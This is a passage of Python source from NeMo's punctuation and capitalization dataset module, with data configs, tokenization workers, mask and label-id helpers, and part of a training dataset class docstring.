"""A base class for punctuation and capitalization data configs. This class does not define ``ds_item``
attribute which works differently for train and evaluation data."""
#################################################
# COMMON DATASET PARAMETERS
#################################################
use_tarred_dataset: bool = MISSING
"""Whether to use tarred dataset. If True, then you should provide ``tar_metadata_file``. Otherwise, you should
provide ``text_file``, ``labels_file``, ``tokens_in_batch``."""
label_info_save_dir: Optional[str] = None
"""A path to a directory where files created during dataset processing are stored. These files include label id
files and label stats files. By default, it is a directory containing ``text_file`` or ``tar_metadata_file``.
You may need this parameter if dataset directory is read-only and thus does not allow saving anything near dataset
files"""
#################################################
# REGULAR DATASET PARAMETERS
#################################################
text_file: Optional[str] = None
"""A path to a file with source text data without punctuation and capitalization."""
labels_file: Optional[str] = None
"""A path to a file with punctuation and capitalization labels in NeMo format. NeMo format is described in
`documentation
<https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/main/nlp/punctuation_and_capitalization.html#nemo-data-format>`_
"""
tokens_in_batch: Optional[int] = None
"""Number of tokens in a batch including paddings and special tokens ([CLS], [SEP], [UNK]). This config does
not have ``batch_size`` parameter."""
max_seq_length: int = 512
"""Max number of tokens in a source sequence. ``max_seq_length`` includes [CLS] and [SEP] tokens. Sequences
which are too long will be clipped by removal of tokens from the end of a sequence."""
num_samples: int = -1
"""A number of samples loaded from ``text_file`` and ``labels_file`` which are used in the dataset. If this
parameter equals ``-1``, then all samples are used."""
use_cache: bool = True
"""Whether to use pickled features. If pickled features does not exist, then pickled features will be created.
For large regular datasets, pickled features may considerably reduce time for training starting. Tokenization
of source sequences is not fast because sequences are split into words before tokenization. For even larger
datasets (~4M), tarred datasets are recommended."""
cache_dir: Optional[str] = None
"""A path to a directory containing cache or directory where newly created cache is saved. By default, it is
a directory containing ``text_file``. You may need this parameter if cache for a dataset is going to be created
and the dataset directory is read-only.
    ``cache_dir`` and ``label_info_save_dir`` are separate parameters for the case when a cache is ready and this cache
    is stored in a read-only directory. In this case you will need a separate writable ``label_info_save_dir``."""
get_label_frequences: bool = False
"""Whether to show and save label frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir``"""
verbose: bool = True
"""If ``True`` dataset instance will print progress messages and examples of acquired features."""
n_jobs: Optional[int] = 0
"""Number of workers used for features creation (tokenization, label encoding, and clipping). If 0, then
multiprocessing is not used; if ``None``, then n_jobs is equal to the number of CPU cores.
There can be weird deadlocking errors with some tokenizers (e.g. SentencePiece) if ``n_jobs`` is greater than zero.
"""
#################################################
# TARRED DATASET PARAMETERS
#################################################
tar_metadata_file: Optional[str] = None
"""A path to tarred dataset metadata file. Tarred metadata file and other parts of tarred dataset are usually
created by the script
`examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py
<https://github.com/NVIDIA/NeMo/blob/main/examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py>`_
"""
tar_shuffle_n: int = 1
"""The size of shuffle buffer of `webdataset`. The number of batches which are permuted."""
#################################################
# PYTORCH DATALOADER PARAMETERS
#################################################
shuffle: bool = True
"""Shuffle batches every epoch. For regular training datasets, the parameter also activates batch repacking every
epoch. For tarred dataset, it would be only batches permutation."""
drop_last: bool = False
"""In cases when data parallelism is used, ``drop_last`` defines the way data pipeline behaves when some replicas
are out of data and some are not. If ``drop_last`` is ``True``, then epoch ends in the moment when any replica runs
out of data. If ``drop_last`` is ``False``, then the replica will replace missing batch with a batch from a pool of
batches that the replica has already processed. If data parallelism is not used, then parameter ``drop_last`` does
not do anything. For more information see ``torch.utils.data.distributed.DistributedSampler``"""
pin_memory: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
num_workers: int = 8
"""See ``torch.utils.data.DataLoader`` documentation."""
persistent_workers: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
@dataclass
class PunctuationCapitalizationTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[str] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay."""
@dataclass
class PunctuationCapitalizationEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay. ``Any`` = ``str`` or
``List[str]``. If a ``List[str]``, then the model is tested or validated on several datasets."""
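# A minimal illustrative sketch (not part of the original module) of instantiating one of the
# structured configs above with OmegaConf. The directory and file names are hypothetical.
def _example_train_data_config():
    return OmegaConf.structured(
        PunctuationCapitalizationTrainDataConfig(
            use_tarred_dataset=False,
            ds_item='/data/punct',            # hypothetical dataset directory
            text_file='text_train.txt',       # hypothetical text file name
            labels_file='labels_train.txt',   # hypothetical labels file name
            tokens_in_batch=5000,
        )
    )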
def is_legacy_data_config(ds_section: DictConfig) -> bool:
return 'use_tarred_dataset' not in ds_section
def legacy_data_config_to_new_data_config(
ds_section: DictConfig, legacy_dataset_section: DictConfig, train: bool
) -> DictConfig:
"""
    Transforms an old-style dataset config into the new format.
    Args:
        ds_section: a ds section (``train_ds``, or ``validation_ds``, or ``test_ds``) from an old-style config. Such
            sections contain a ``batch_size`` parameter.
        legacy_dataset_section: a ``model.dataset`` section. The ``model.dataset`` section contains a ``data_dir``
            parameter
        train: ``True`` if ``train_ds`` is transformed and ``False`` otherwise
Returns:
New format dataset based on either ``PunctuationCapitalizationTrainDataConfig`` (``train=True``) or
``PunctuationCapitalizationEvalDataConfig`` (``train=False``)
"""
if train:
cls = PunctuationCapitalizationTrainDataConfig
ds_item = legacy_dataset_section.get('data_dir')
else:
cls = PunctuationCapitalizationEvalDataConfig
ds_item = ds_section.get('ds_item')
ds_item = legacy_dataset_section.get('data_dir') if ds_item is None else ds_item
if ds_item is None:
raise ValueError(
f"Data directory was not found in legacy config.\nspecific dataset configuration:\n"
f"{OmegaConf.to_yaml(ds_section)}\nmodel.dataset:\n{OmegaConf.to_yaml(legacy_dataset_section)}"
)
new_config = OmegaConf.structured(
cls(
use_tarred_dataset=False,
text_file=ds_section.text_file,
labels_file=ds_section.labels_file,
ds_item=ds_item,
max_seq_length=legacy_dataset_section.get(
'max_seq_length', PunctuationCapitalizationDataConfigBase.max_seq_length
),
)
)
return new_config
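# A minimal illustrative sketch (not part of the original module) of converting a legacy config with
# `legacy_data_config_to_new_data_config`. The keys mirror what the function above reads; the concrete
# paths and values are hypothetical.
def _example_legacy_conversion():
    legacy_train_ds = OmegaConf.create(
        {'text_file': 'text_train.txt', 'labels_file': 'labels_train.txt', 'batch_size': 32}
    )
    legacy_model_dataset = OmegaConf.create({'data_dir': '/data/punct', 'max_seq_length': 128})
    # Produces a PunctuationCapitalizationTrainDataConfig with ds_item='/data/punct'
    return legacy_data_config_to_new_data_config(legacy_train_ds, legacy_model_dataset, train=True)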
def _check_number_of_labels(
words: List[str],
query: str,
qi: int,
split_i: int,
punctuation_labels: List[str],
capitalization_labels: List[str],
) -> None:
if len(words) != len(punctuation_labels):
raise ValueError(
f"Number of punctuation labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of punctuation labels: "
f"{len(punctuation_labels)}. First 100 characters of the query: '{query[:100]}', punctuation labels: "
f"'{punctuation_labels}'"
)
if len(words) != len(capitalization_labels):
raise ValueError(
f"Number of capitalization labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of capitalization labels: "
f"{len(capitalization_labels)}. First 100 characters of the query: '{query[:100]}', "
f"capitalization labels: '{capitalization_labels}'"
)
def _show_prog(queues: Tuple[mp.Queue, ...], totals: List[int], descriptions: List[str], units: List[str]) -> None:
"""
Show several ``tqdm`` progress bars.
Args:
queues: a list of queues by which progress is delivered into this function. Each queue is responsible for one
progress bar. ``show_prog`` function extracts integers from ``queues`` elements and adds them to progress
bars. If value extracted from a queue equals ``-1``, then corresponding progress bar is closed. When all
progress bars are closed, this function returns.
        totals: list of values each progress bar has to reach for 100%. See more in the description of the ``total``
            parameter of the ``tqdm.tqdm`` function
descriptions: list of descriptions of progress bars. See more in a description of ``desc`` parameter of
``tqdm.tqdm`` function
units: list of progress bar units. See more in a description of ``unit`` parameter of ``tqdm.tqdm`` function
"""
if not all([len(queues) == len(v) for v in [totals, descriptions, units]]):
raise ValueError(
f"All of parameters `queues`, `total_num_lines`, `descriptions`, `units` have to have equal lengths. "
f"len(queues)={len(queues)}, len(total_num_lines)={len(totals)}, "
f"len(descriptions)={len(descriptions)}, len(units)={len(units)}."
)
prog = [
tqdm(total=tt, desc=dd, unit=uu, unit_scale=True, position=i)
for i, (tt, dd, uu) in enumerate(zip(totals, descriptions, units))
]
finished = [False] * len(queues)
while True:
for i, queue in enumerate(queues):
stop = False
to_add = 0
try:
v = queue.get(block=False)
while v != -1:
to_add += v
v = queue.get(block=False)
stop = True
except Empty:
if to_add == 0 and not stop:
continue
prog[i].n += to_add
prog[i].update(0)
if prog[i].n >= totals[i]:
finished[i] = True
prog[i].close()
if stop:
if prog[i].n < totals[i]:
logging.warning(
f"Progress with description '{descriptions[i]}' terminated before progress bar "
f"reached 100%. prog.n={prog[i].n}, total_num_lines={totals[i]}"
)
finished[i] = True
prog[i].close()
if all(finished):
break
sleep(0.1)
class Progress:
"""
Manages several ``tqdm`` progress bars for multi process tasks. This class can be used as context manager.
The class starts separate process which creates and updates progress bars. Information to progress process is
passed via multiprocessing queues. There is a separate queue for every progress bar.
You can use it as context manager:
.. code-block:: python
with Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"]) as progress_queues:
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
Or without context manager:
.. code-block:: python
progress = Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"])
progress_queues = progress.get_queue()
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
progress.finish()
In a worker function you will have to put number of processed items into the progress queues. For example:
.. code-block:: python
def worker_func(my_datum, parrot_progress_queue, frog_progress_queue):
...
for i in range(10):
parrot_progress_queue.put(1)
frog_progress_queue.put(2)
Progress bars and progress process are closed when ``finish`` or ``__exit__`` methods are called.
"""
def __init__(self, total: Union[int, List[int]], desc: Union[str, List[str]], unit: Union[str, List[str]]) -> None:
"""
Starts progress process and creates queues for passing information to the progress process. Number of progress
bars is equal to the max length of lists ``total``, ``desc``, ``unit``. If none of these parameters is a list,
then 1 progress bar is created.
Args:
total: a list of ``int`` which length is equal to the number of progress bars OR an ``int`` OR a list of
one ``int``. Number which comprises 100% of progress bar. When sum of values passed through the
corresponding queue equals ``total`` corresponding progress bar reaches 100%. If ``total`` is an
``int`` or a list of one element, then all progress bars have equal ``total`` parameter.
desc: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. Description of a progress bar which is showed as a prefix. See more in description of
parameter ``desc`` of function ``tqdm.tqdm``.
unit: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. A unit of a progress bar. See more in description of parameter ``unit`` of function
``tqdm.tqdm``.
"""
if not isinstance(total, list):
total = [total]
if not isinstance(desc, list):
desc = [desc]
if not isinstance(unit, list):
unit = [unit]
num_processes = max([len(total), len(desc), len(unit)])
for param in [total, desc, unit]:
if len(param) not in [num_processes, 1]:
raise ValueError(
f"If parameter of `Progress.__init__` method is a list, then it has to be the same length as other "
f"parameters which are lists"
)
if len(param) == 1:
param *= num_processes
manager = mp.Manager()
self.progress_queues = tuple(manager.Queue() for _ in range(num_processes))
self.progress_process = mp.Process(target=_show_prog, args=(self.progress_queues, total, desc, unit))
self.progress_process.start()
def __enter__(self) -> Tuple[mp.Queue, ...]:
return self.get_queues()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.finish()
def get_queues(self) -> Tuple[mp.Queue, ...]:
return self.progress_queues
def finish(self) -> None:
for q in self.progress_queues:
q.put(-1)
self.progress_process.join()
class TokenizeCreateMasksClipWorker:
"""A worker for tokenization, encoding labels, creating masks for first token in a word, sequence clipping"""
def __init__(
self,
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
pad_label: str,
verbose: bool,
progress_queue: mp.Queue,
) -> None:
"""
Args:
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of
tokens in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence
are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
            pad_label: pad value used for labels. By default, it's the neutral label for punctuation and capitalization.
                Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
verbose: whether to report when the worker finishes its job
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
"""
self.max_seq_length = max_seq_length
self.tokenizer = tokenizer
self.punct_label_ids = punct_label_ids
self.capit_label_ids = capit_label_ids
self.pad_label = pad_label
self.verbose = verbose
self.progress_queue = progress_queue
def _maybe_clip(self, values: List[int], append_value: int) -> List[int]:
if len(values) > self.max_seq_length:
return values[: self.max_seq_length - 1] + [append_value]
return values
def __call__(
self,
queries: List[str],
punct_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
capit_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
split_i: int,
) -> Tuple[np.ndarray, List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenize, clip, encode labels, and create masks of first tokens in words.
Args:
queries: text sequences
punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
            capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
split_i: number of a split which is processed. Used for logging
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of the corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in
one word have identical labels
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens
in one word have identical labels
"""
all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels = [], [], [], []
progress_made = 0
for i, query in enumerate(queries):
words = query.split()
input_ids, subtokens_mask = [self.tokenizer.cls_id], [0]
_check_number_of_labels(words, query, i, split_i, punct_label_lines[i], capit_label_lines[i])
pad_id = self.punct_label_ids[self.pad_label]
punct_labels = [pad_id]
punct_query_labels = [self.punct_label_ids[lab] for lab in punct_label_lines[i]]
capit_labels = [pad_id]
capit_query_labels = [self.capit_label_ids[lab] for lab in capit_label_lines[i]]
for j, word in enumerate(words):
word_ids = self.tokenizer.text_to_ids(word)
if not word_ids and len(word):
word_ids = [self.tokenizer.unk_id]
input_ids.extend(word_ids)
subtokens_mask.append(1)
subtokens_mask.extend([0] * (len(word_ids) - 1))
punct_labels.extend([punct_query_labels[j]] * len(word_ids))
capit_labels.extend([capit_query_labels[j]] * len(word_ids))
            # append the [SEP] token id to terminate the sequence
input_ids.append(self.tokenizer.sep_id)
subtokens_mask.append(0)
all_input_ids.append(np.array(self._maybe_clip(input_ids, self.tokenizer.sep_id), dtype=np.int32))
all_subtokens_mask.append(np.array(self._maybe_clip(subtokens_mask, 0), dtype=bool))
punct_labels.append(pad_id)
punct_all_labels.append(np.array(self._maybe_clip(punct_labels, pad_id), dtype=np.int32))
capit_labels.append(pad_id)
capit_all_labels.append(np.array(self._maybe_clip(capit_labels, pad_id), dtype=np.int32))
progress_made += 1
if progress_made >= TOKENIZATION_PROGRESS_REPORT_PERIOD:
self.progress_queue.put(progress_made)
progress_made = 0
self.progress_queue.put(progress_made)
if self.verbose:
logging.info(f"Finished processing data split number {split_i}")
return all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels
def _get_features(
queries: Union[List[str], Tuple[str, ...]],
punct_label_lines: Union[List[str], Tuple[str, ...]],
capit_label_lines: Union[List[str], Tuple[str, ...]],
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Dict[str, int] = None,
capit_label_ids: Dict[str, int] = None,
pad_label: str = 'O',
verbose: bool = True,
n_jobs: Optional[int] = 0,
progress_queue: Optional[mp.Queue] = None,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenizes data, encodes labels, creates masks of first tokens in words, clips sequences by number of tokens.
Args:
queries: text sequences
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of tokens
in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
        pad_label: pad value used for labels. By default, it's the neutral label for punctuation and capitalization.
            Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
        punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
        capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
verbose: whether to show examples of tokenized data and various progress information
n_jobs: a number of workers used for preparing features. If ``n_jobs <= 0``, then do not use multiprocessing
and run features creation in this process. If not set, number of workers will be equal to the number of
CPUs.
!!WARNING!!
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in one
word have identical labels.
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens in
one word have identical labels
"""
if verbose:
logging.info("Start initial tokenization.")
create_progress_process = progress_queue is None
if n_jobs is None:
n_jobs = min(mp.cpu_count(), len(queries))
if verbose:
logging.info(f"Running tokenization with {n_jobs} jobs.")
# Number of queries in split
split_size = min(len(queries) // max(n_jobs, 1), MAX_NUM_QUERIES_IN_SPLIT)
n_split = len(queries) // split_size
split_queries = [queries[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)] + [
queries[split_size * (n_split - 1) :]
]
split_punct_labels_lines = [
punct_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [punct_label_lines[split_size * (n_split - 1) :]]
split_capit_labels_lines = [
capit_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [capit_label_lines[split_size * (n_split - 1) :]]
args = list(zip(split_queries, split_punct_labels_lines, split_capit_labels_lines, range(n_split)))
if create_progress_process:
progress = Progress(len(queries), "Tokenization", "query")
progress_queue = progress.get_queues()[0]
if n_jobs > 0:
with mp.Pool(n_jobs) as pool:
result = pool.starmap(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue
),
args,
)
else:
result = []
for x in args:
result.append(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue,
)(*x)
)
if create_progress_process:
progress.finish()
input_ids, subtokens_mask, punct_labels, capit_labels = tuple(list(itertools.chain(*e)) for e in zip(*result))
if verbose:
logging.info("Finished initial tokenization.")
get_stats([len(inp) for inp in input_ids])
logging.info(f"Finished clipping and padding.")
for i in range(min(len(input_ids), 5)):
logging.info("*** Example ***")
logging.info("i: %s" % (i))
logging.info("subtokens: %s" % " ".join(list(map(str, input_ids[i]))))
logging.info("subtokens_mask: %s" % " ".join(list(map(str, subtokens_mask[i]))))
logging.info("punct_labels: %s" % " ".join(list(map(str, punct_labels[i]))))
logging.info("capit_labels: %s" % " ".join(list(map(str, capit_labels[i]))))
return input_ids, subtokens_mask, punct_labels, capit_labels
def create_masks_and_segment_ids(
input_ids: np.ndarray,
subtokens_mask: np.ndarray,
pad_id: int,
cls_id: int,
sep_id: int,
ignore_start_end: bool,
ignore_extra_tokens: bool,
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Creates segment ids array, input mask, loss mask.
Segment ids array is BERT token type ids in HuggingFace terminology. It is a zeros array for punctuation
and capitalization task.
Input mask element is ``True`` if an element of ``input_ids`` is not padding and ``False`` otherwise.
Loss mask element is ``True`` for the first token in a word. If ``ignore_start_end=False``, then loss mask
element is ``True`` for [CLS] and [SEP] tokens. If ``ignore_extra_tokens=False``, then loss mask element is ``True``
for all word tokens. In all other cases loss mask elements are ``False``.
Args:
input_ids: an integer array of shape ``[Batch, Time]`` containing ids of source token ids
subtokens_mask: a boolean array of shape ``[Batch, Time]`` which elements are ``True`` if they correspond to
the first token of some word
pad_id: an id of padding token
cls_id: an id of [CLS] token
sep_id: an id of [SEP] token
ignore_start_end: whether to compute loss for [CLS] and [SEP] tokens
ignore_extra_tokens: whether to compute loss for not first tokens in words
Returns:
segment_ids: int8 array of shape [Batch, Time]
input_mask: boolean array of shape [Batch, Time]
loss_mask: boolean array of shape [Batch, Time]
"""
segment_ids = np.zeros_like(input_ids, dtype=np.int8)
input_mask = np.not_equal(input_ids, pad_id)
    special_mask = np.equal(input_ids, cls_id) | np.equal(input_ids, sep_id)
if ignore_start_end:
if ignore_extra_tokens:
loss_mask = subtokens_mask
else:
loss_mask = input_mask & ~special_mask
else:
if ignore_extra_tokens:
loss_mask = subtokens_mask | special_mask
else:
loss_mask = input_mask
return segment_ids, input_mask, loss_mask
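# A minimal illustrative sketch (not part of the original module) of `create_masks_and_segment_ids`
# on a single padded sequence [CLS] w1 w1 w2 [SEP] [PAD]. The token ids (101, 102, 0, ...) are
# hypothetical placeholders, not tied to any particular tokenizer.
def _example_masks_and_segment_ids():
    input_ids = np.array([[101, 5, 5, 7, 102, 0]])
    subtokens_mask = np.array([[False, True, False, True, False, False]])
    # With both ignore flags set, the returned loss mask equals `subtokens_mask`:
    # loss is computed only on the first token of each word.
    return create_masks_and_segment_ids(
        input_ids, subtokens_mask, pad_id=0, cls_id=101, sep_id=102,
        ignore_start_end=True, ignore_extra_tokens=True,
    )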
def create_label_ids(unique_labels: Set[str], pad_label: str) -> Dict[str, int]:
"""
Returns label ids dictionary. ``pad_label`` always has id ``0``. Other labels are sorted in alphabetical order.
Args:
        unique_labels: a set of labels from which label ids dictionary is created. May or may not contain ``pad_label``
pad_label: label used for padding. It is also a neutral label
Returns:
label ids dictionary
"""
label_ids = {pad_label: 0}
if pad_label in unique_labels:
unique_labels.remove(pad_label)
for label in sorted(unique_labels):
label_ids[label] = len(label_ids)
return label_ids
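# A minimal illustrative sketch (not part of the original module): the pad label always receives id 0
# and the remaining labels are sorted alphabetically.
def _example_create_label_ids():
    return create_label_ids({'O', ',', '.', '?'}, pad_label='O')
    # -> {'O': 0, ',': 1, '.': 2, '?': 3}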
def load_label_ids(file_path: Union[str, os.PathLike]) -> Dict[str, int]:
ids = {}
with open(file_path) as f:
for i, line in enumerate(f):
ids[line.strip()] = i
return ids
def save_label_ids(label_ids: Dict[str, int], file_path: Path) -> None:
"""
    Saves label ids map to a file. Each line of the file contains one label. Labels are saved in order of
    increasing ids.
Args:
label_ids: label id dictionary. Pad label has to have id ``0``
file_path: path to a file where labels will be saved
"""
file_path.parent.mkdir(parents=True, exist_ok=True)
with file_path.open('w') as out:
labels, _ = zip(*sorted(label_ids.items(), key=lambda x: x[1]))
out.write('\n'.join(labels))
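# A minimal illustrative sketch (not part of the original module) of the save/load round trip; the
# directory and file name are hypothetical. Labels are written one per line in order of increasing id,
# so `load_label_ids` recovers the same mapping.
def _example_label_ids_round_trip(tmp_dir: Path) -> bool:
    label_ids = {'O': 0, ',': 1, '.': 2}
    vocab_file = tmp_dir / 'punct_label_ids.csv'
    save_label_ids(label_ids, vocab_file)
    return load_label_ids(vocab_file) == label_ids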
def raise_not_equal_labels_error(
first_labels: Dict[str, int], second_labels: Dict[str, int], first_labels_desc: str, second_labels_desc: str
) -> None:
"""
A helper function for raising comprehensible error if labels from 2 sources are different.
Such sources may include:
- labels stored in .nemo checkpoint
- labels stored in tarred dataset
- labels passed in config parameters ``model.common_dataset_parameters.{punct_label_ids,capit_label_ids}``
- labels from files passed in config parameters ``model.class_labels.{punct_labels_file,capit_labels_file}``
- labels in attributes ``PunctuationCapitalizationModel.{punct_label_ids,capit_label_ids}``
- any other source
    This function helps to detect configuration errors early and gives error messages that are easy to interpret.
Call this function if ``first_labels != second_labels``.
Args:
first_labels: first dictionary with labels
second_labels: second dictionary with labels
first_labels_desc: a description of first labels
second_labels_desc: a description of second labels
"""
missing_in_first = {k: second_labels[k] for k in set(second_labels) - set(first_labels)}
missing_in_second = {k: first_labels[k] for k in set(first_labels) - set(second_labels)}
not_equal = {
k: {'FIRST LABELS': first_labels[k], 'SECOND LABELS': second_labels[k]}
for k in set(first_labels) & set(second_labels)
if first_labels[k] != second_labels[k]
}
msg = f"{first_labels_desc} (FIRST LABELS) are not equal to {second_labels_desc} (SECOND LABELS)."
if len(missing_in_first) > 0:
msg += f" Number of SECOND LABELS missing in the FIRST LABELS: {len(missing_in_first)}."
if len(missing_in_second) > 0:
msg += f" Number of FIRST LABELS missing in the SECOND LABELS: {len(missing_in_second)}."
if len(not_equal) > 0:
msg += f" Number of labels which are not equal: {len(not_equal)}."
if len(missing_in_first) > 0:
msg += (
f" Several examples of missing SECONDS LABELS in the FIRST LABELS: "
f"{dict(list(missing_in_first.items())[:3])}."
)
if len(missing_in_second) > 0:
msg += (
f" Several examples of missing FIRST LABELS in the SECOND LABELS: "
f"{dict(list(missing_in_second.items())[:3])}."
)
if len(not_equal) > 0:
msg += f" Several examples of labels which are not equal: {dict(list(not_equal.items())[:3])}"
raise ValueError(msg)
def pad(vectors: List[np.ndarray], length: int, value: Union[int, float, bool]) -> np.ndarray:
"""
Pad vectors to length ``length`` and then stack.
Args:
vectors: a list of 1D arrays. Arrays to pad and stack
        length: a length of padded sequence. Has to be greater than or equal to the maximum length of an element of
            ``vectors``.
value: a value used for padding
Returns:
an array of padded vectors
"""
result = []
for v in vectors:
result.append(np.concatenate([v, np.full([length - v.shape[0]], value, dtype=v.dtype)]))
return np.stack(result)
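# A minimal illustrative sketch (not part of the original module): two variable-length int32 vectors
# padded with zeros to a common length of 4 and stacked into a [2, 4] array.
def _example_pad():
    vectors = [np.array([1, 2, 3], dtype=np.int32), np.array([4], dtype=np.int32)]
    return pad(vectors, length=4, value=0)  # -> [[1, 2, 3, 0], [4, 0, 0, 0]]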
class BertPunctuationCapitalizationDataset(Dataset):
"""
A dataset to use during training for punctuation and capitalization tasks.
For inference, you will need
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_infer_dataset.BertPunctuationCapitalizationInferDataset`.
For huge datasets which cannot be loaded into memory simultaneously use
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_tarred_dataset.BertPunctuationCapitalizationTarredDataset`.
Args:
text_file (:obj:`Union[str, os.PathLike]`): a path to a file with sequences, each line should contain a text
without punctuation and capitalization
labels_file (:obj:`Union[str, os.PathLike]`): a path to a file with labels, each line corresponds to word
labels for a sentence in the ``text_file``. Labels have to follow format described in this section of
documentation :ref:`NeMo Data Format<nemo-data-format-label>`.
        max_seq_length (:obj:`int`): max number of tokens in a source sequence. ``max_seq_length`` includes [CLS]
and [SEP] tokens. Sequences which are too long will be clipped by removal of tokens from the end of the
sequence.
tokenizer (:obj:`TokenizerSpec`): a tokenizer instance which has properties ``unk_id``, ``sep_id``, ``bos_id``,
``eos_id``.
num_samples (:obj:`int`, `optional`, defaults to :obj:`-1`): a number of samples you want to use for the
dataset. If ``-1``, use all dataset. Useful for testing.
tokens_in_batch (:obj:`int`, `optional`, defaults to :obj:`5000`): number of tokens in a batch including
paddings and special tokens ([CLS], [SEP], [UNK]). This class :meth:`__getitem__` method returns not
samples but ready batches. Number of samples in a batch is adjusted for input sequences lengths. If input
sequences are short, then a batch will contain more samples. Before packing into batches, samples are
sorted by number of tokens they contain. Sorting allows to reduce number of pad tokens in a batch
            significantly. Regular PyTorch data loader shuffling will only permute batches without changing their content.
Proper shuffling is achieved via calling method :meth:`repack_batches_with_shuffle` every epoch.
pad_label (:obj:`str`, `optional`, defaults to :obj:`'O'`): pad value to use for labels. It's also the neutral
label both for punctuation and capitalization.
punct_label_ids (:obj:`Dict[str, int]`, `optional`): dict to map punctuation labels to label ids. For dev set,
use label ids generated during training to support cases when not all labels are present in the dev set.
For training, it is recommended to set ``punct_label_ids`` to ``None`` or load from cache.
capit_label_ids (:obj:`Dict[str, int]`, `optional`): same ``punct_label_ids`` for capitalization labels.
ignore_extra_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to compute loss on
tokens which are not first tokens in a word. For example, assume that word ``'tokenization'`` is tokenized
into ``['token', 'ization']``. If ``ignore_extra_tokens=True``, loss mask for the word is
``[True, False]``, and if ``ignore_extra_tokens=False``, then loss mask is ``[True, True]``.
ignore_start_end (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to ignore [CLS] and [SEP] tokens
in the loss_mask.
        use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to use pickled features or not. If
            pickled features do not exist and ``use_cache=True``, then pickled features will be created. Pickled
            features are looked for and stored in ``cache_dir``. Pickled features include input ids, subtokens mask
            (mask of first tokens in words), encoded punctuation and capitalization labels, label ids. Features
            creation consumes considerable time, so ``use_cache=True`` significantly speeds up training start-up.
.. warning::
                If you spawned more than 1 process BEFORE dataset creation, then the ``use_cache`` parameter
